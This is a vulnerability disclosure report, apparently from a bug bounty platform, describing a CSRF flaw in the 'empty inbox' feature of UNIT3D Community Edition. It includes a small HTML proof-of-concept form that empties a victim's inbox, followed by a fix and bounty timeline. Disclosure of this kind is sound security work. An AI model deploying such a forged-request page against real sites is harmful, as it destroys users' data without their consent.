Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Oct 9th 2021


Description

There is a CSRF vulnerability on Empty Inbox in Private Messages inbox.

Proof of Concept

//POC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://unit3d.site/mail/empty-inbox">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 months ago
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 months ago
HDVinnie validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie confirmed that a fix has been merged on 63ae97 2 months ago
HDVinnie has been awarded the fix bounty
inbox.blade.php#L39 has been validated
amammad
a month ago

Researcher


hey maintainer

can i ask you to increase the bounty please?